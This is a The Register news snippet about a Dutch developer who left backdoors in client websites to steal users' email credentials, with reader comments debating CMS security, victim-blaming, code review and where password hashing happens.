Dodgy Dutch developer built backdoors into thousands of sites Dutch police are this week warning 20,000 users that their email accounts were hacked after a malicious web developer left backdoors in the sites he built. Cops found the credentials in the un-named 35-year-old man's email account and say he used the stolen personal details to open accounts, convince family members to transfer …
[Dutch police] also warn web masters to employ trustworthy web developers
But if you're outsourcing because you don't know how to do something (e.g. You're running a small business, want a website but know nothing about how to build or design one) how are you going to know someone is (or is not) trustworthy?
And remember, don't get mugged by criminals, and always work smarter not harder.
Plus many other sound bites which shift the blame onto the victim.
Unless, of course, the job description included "actual or potential criminals are encouraged to apply". Are they in fact suggesting that the businesses went out of their way to employ untrustworthy web developers?
Oh, and always remember, kids, stay away from untrustworthy lawyers and accountants. Umm..and stay way from all politicians both local and national; that one at least is easy.
Sadly noting that the criminal is not a criminal until after the crime has been committed, detected, and then the perpetrator convicted. Criminals aren't always easily detectable.
What a neat excuse to buy the cheapest piece of something labelled "a car" or "a plane". One is free to buy a car which has never undergone a crash test. He might even survive couple of years without crashing that car. Similarly recently the Ukrainians have bought flying drones worth tens of millions only to discover they have been manufactured back in the 80's, and the analogue radio channel had missed the concept of security completely. A corn field can quickly be converted to an airfield. All one needs is a pole, piece of wood and some paint.
"But then smart arses such as yourself say not to use the likes of Wordpress and Joomla and leave it to professional web developers. So which is it?"
Well the classic route to starting / growing a business is to formulate a business plan and seek funding if the idea is financially feasible. If you've done your research and have a solid plan you will get funding.
If you're simply punting crap from a drop ship outfit you won't.
Cutting corners and bastardising a blog platform to work as a store front isn't a business plan. Sure, it can be done...but are really caring about your customers when you do things on the cheap?
Wordpress, Joomla etc online shops are a cancer...a bit like those dodgy "phone unlocking" tat shit holes that spawn on high streets selling low grade Shenzen specials.
You don't have to get your store front built from scratch but you really should pay the extra dough to deploy a purpose built product rather than try and bend a blog to your will.
Wordpress is badly out of date with its practices. These days there should never be a situation where your front end connects directly to a database. You should have an API in between and your payments should be processed on a box nowhere near your frontend.
Its not expensive to do something like this. Id usually charge in the region of £1000-£2000 for this which for a proper business is peanuts. I can see why this price would look unattractive to someone moonlighting as online vendor attempting to make beer money though.
For a bonafide business (one that is declaring income and trading legitimately), this is barely a cost as it can be written off as an expense against tax.
Wordpress, Joomla etc online shops are a cancer...a bit like those dodgy "phone unlocking" tat shit holes that spawn on high streets selling low grade Shenzen specials.
You don't have to get your store front built from scratch but you really should pay the extra dough to deploy a purpose built product rather than try and bend a blog to your will.
Nonsense. Joomla and WP are simply tools, neither good nor bad but they deliver only results if you understand how to use them. I cannot see anyone run a shop on WP, that's simply not what it was designed for (it's OK for a little "public only" website), but it's quite possible on Joomla because it has the fundamental controls in place to make that happen.
The benefit of starting with a standard CMS is that you have fairly well tested fundamentals. To write something that is Internet proof is a long process, and by using a CMS that has been through this sort of warfare already means that you can focus on the bit that makes it from "a Joomla/Plone/Drupal/homebrew patchwork/whatever site/toolkit" to YOUR site. It means you don't have to start from the ground up with functionality, DB design, user management, 2FA embedding etc etc - you can focus on making it yours. That's how you get to good functionality without having to start from scratch. It also means you benefit from a fairly large network of people who pick up problems and vulnerabilities instead of sitting on a island with no idea of impending shark attacks (with or without lasers).
In addition, you don't just have an API separation at application level, you also segregate at network level. Anything that takes in data from the public should live on a DMZ and should not retain that on the site but should push this through to another network - money and personal details must be at least 2 walls away from the raw Internet. I know that's not the modern way of working, but when it comes to protecting revenue as well as users I prefer a bit of old school.
Its not expensive to do something like this. Id usually charge in the region of £1000-£2000 for this which for a proper business is peanuts.
For a full website handling user details and payment data? Yeah, right. And who will you be selling my users' details to to make up the shortfall?
You make very good points about "standing on the shoulders of a crowd of giants" when using an established open-source CMS. I will back WordPress against a bespoke e-commerce site any day of the week, simply because it has been stress-tested to f**k in the wild.
I cannot see anyone run a shop on WP, that's simply not what it was designed for (it's OK for a little "public only" website)
WooCommerce extends WordPress to do just that. It does it pretty well, and is now used by 40% of the world's online stores. In other words, WordPress is the most popular e-commerce platform in the world.
Such downvotes. Wow.
My point was if you cut corners and do things on the cheap you're more likely to be a victim of this kind of practice.
An Ikea wardrobe is much cheaper than a hand made oak wardrobe made by a carpenter. The handmade one will be higher quality, will last longer and is less prone to structural issues however it costs a metric shit ton more simply because it takes longer to produce and is made of more expensive materials. The carpenter knows you're paying more and will put in the effort to try and win repeat business.
If you purchase a shitty store front of Fiverr et al you probably arent really building a relationship with your supplier and its likely that wont give him any repeat business, you'll likely move on and find a cheap wanker to support the site and screw him as well. Opening the door for another potential thief.
Being a cheapskate is a slippery slope. You'll never acquire the quality you need to show your customers you care.
This is a trap a lot of small businesses fall into and its a common reason why small businesses fail.
Do it right or dont do it. After all if you're trying to convince your customers that your products are of a high quality why would you do it through a low quality site?
If your store front sucks your ability to identify high quality products might suck as well.
I'm not a professional coder, just an ops person. However, I have discovered on a live production website post handover that the original developer had put in a few unrequested easter eggs, such as comments viewable in the outputted HTML source that he was the developer (and contact *dev* via details if you need work done) , which was somewhat fair enough.
I was inclined to leave those since the bloke had done a good job up until I noticed that the dev was essentially getting all of the customer details put through the system copied to him. This could quite legitimately have been a development thing as he hadn't got access to our systems and may have just set up a test system identical to our internal system while he was developing the system.
However, equally it could have been deliberate. Obviously, it took no more than a few seconds to delete the lines of code in question but I do wonder how many companies even bother to look through code that's been developed for them.
Trust nobody, check everything. You'll be surprised what you discover on occasion.
The public cant even choose trust worthy politicians with the "aided" scrutiny of the media or have a so called choice in the tech ecosystems on offer to the world, so when clever people make up the rules and then exploit their own rules, is it any wonder some people resort to effectively imitating global "leaders" without the contractual paperwork detailing his actions?
"It's a small country. Wouldn't normal people talk on the phone or meet before sending dosh?"
Why?
Becasue they suddenly suspect that an email from their own son or daughter may be a fake?
After 10 years of genuine emails.
And what does talking on the phone have to do with the size of the country?
Or driving for that matter. Do you drive 100 miles to borrow what amounts to the petrol money to get there and back? You ask for money to be withdrawn. Drive there. Get the money. Drive home again. Go to the bank. Deposit it into your own account. Seems stupid, doesn't it?
There's an update on the Dutch police website linked from the article.
The police had sent out an e-mail to around 20,000 accounts warning that their account details had been compromised. Shortly afterwards, the police started to receive phone calls reporting that this had triggered a wave of fake e-mails purporting to come from the police with the same warning but containing a dodgy "click here"...
It seems no opportunity goes unexploited.
It seems no opportunity goes unexploited.
Yes, but the speed of that attack suggests it must have been prepped by people somehow related to this guy, or even people he worked with. It's too quick a turnaround without some people having had advance notice. Something stinks here, badly.
Having a grasp of the language and worked there for a couple of years, I think another option is also important to consider: the Dutch police themselves also seem to fall in the "dodgy Dutch", opportunistic category. Taking personal experiences, familiarity with the countries culture (and being a grumpy old fart) I wouldn't be surprised if one of them would have seen this opportunity and reacted quickly...
Not that bad? Well... (sorry people, you'll need Google Translate I'm afraid)
https://www.transparency.nl/nieuws/2015/10/corruptie-politie/
http://justitie.eenvandaag.nl/tv-items/71379/_drugs_met_medeweten_politie_land_in_gesmokkeld_
http://www.rtvoost.nl/nieuws/default.aspx?nid=238345
Of course corruption exists in a country with Rotterdam, the largest habour in Europe where cocaine is smuggled with assistence of corrupt borderpolice and Aalsmeer the largest flower auction in the world, which is infiltered by the Italian mafia.
But it is unfair to say that the Dutch policeforce as such is corrupt.
Try this : code review(s) by independent experts followed by software build done b said experts. Hire a company with a good reputation to do this. Keep sole control of authentication credentials (said good company will advise on how to do this easily). Do not store user information in unencrypted form.
Sure it'll cost some money. But nowhere near as much as you might lose if you don't.
Say thank you for my free consultancy advice here.
There are many people who are (incorrectly) suggesting that by using a platform such as Wordpress or Joomla there is somehow a greater risk of this sort of thing happening.
Absolute nonsense.
Both of those systems are written in PHP. If you have access to the source files for a website, you can easily capture (and log, or do whatever you want) with any form data that the user submits. All that's required here is for the rouge developer to add code to things like registration or login forms, and store it somewhere for use later on. All it requires is access to the POST data, which is trivial in any language.
And before some idiot suggests SSL or encryption - no, that doesn't make any difference here. When the form is submitted to the server all of the information entered is readable within the scripting language. Things like password hashing happen AFTER the data is posted to the server. So if you capture it before, it's readable, in plain text.
Basically if someone has access to the source files of a website where users are inputting information, they can do essentially anything with that data.
This is not specific to PHP and could be done in any server side language.
Password hashing done server side, after submission...
Ok. But couldn't/shouldn't you hash it in JS using your algorithm of choice on the client side, then submit the hash. I mean, that is what I understood to be the way to go.
I've been wrong before
"But couldn't/shouldn't you hash it in JS using your algorithm of choice on the client side"
No. You should never rely on anything client side for security. Anything client side can be manipulated - or disabled (e.g. turn off javascript in a browser) - by the end user. Any security measures must be done server side.
Any type of "validation" you see being done in Javascript is purely for cosmetic purposes. If you disable js in your browser and submit a form that's only being validated with Javascript you can submit anything to the server - and if no checking is done there - the consequences can be severe.
So it's three months later - but I thought I'd leave this here on the off chance someone sees it:
http://www.ietf.org/rfc/rfc2945.txt
My original comment was about password security, while not relevant to the security of a website's source code (hence the admission of flippancy), the above is an interesting protocol I had not come across before - and validates my original statement.
The Register 
Biting the hand that feeds IT
Copyright. All rights reserved © 1998–2025
